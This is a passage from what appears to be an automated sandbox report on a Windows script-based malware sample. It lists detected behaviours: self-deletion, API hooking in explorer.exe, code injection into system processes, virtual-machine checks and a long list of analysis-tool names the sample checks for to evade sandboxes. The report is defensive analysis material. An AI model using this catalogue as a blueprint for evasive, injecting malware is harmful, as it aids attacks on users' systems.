Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\ptgzm1gd04up.vbs
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF91A45521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF91A455200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXEH/
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE0*
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2830
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cwptyz3z.dll
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\z00zcx10.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 2572 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW, 29_2_04D0FD7C
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.557387268.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00$
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.557387268.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0s_
Source: RuntimeBroker.exe, 00000025.00000000.586510473.00000257BD05C000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000002.636197115.00000000044B1000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lo
Source: ogress.psd.0.dr Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: RuntimeBroker.exe, 0000001F.00000002.623935103.000001E988E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0\?
Source: mshta.exe, 00000014.00000003.517212753.000002212B6F6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}T7
Source: mshta.exe, 00000014.00000002.518870496.0000021926901000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\_
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}6B
Source: mshta.exe, 00000014.00000003.517212753.000002212B6F6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: control.exe, 0000001E.00000002.580413033.000001C3E66C4000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: ogress.psd.0.dr
Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E98B1C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 135769E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 257BEBD0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 28E0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 1B5764B0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 1BA61580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 1BA61580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 1BA61580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7B0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 28B0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3508
Source: C:\Windows\explorer.exe Thread register set: target process: 3756
Source: C:\Windows\explorer.exe Thread register set: target process: 4292
Source: C:\Windows\explorer.exe Thread register set: target process: 4600
Source: C:\Windows\System32\control.exe Thread register set: target process: 3508
Source: C:\Windows\System32\control.exe Thread register set: target process: 5436
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe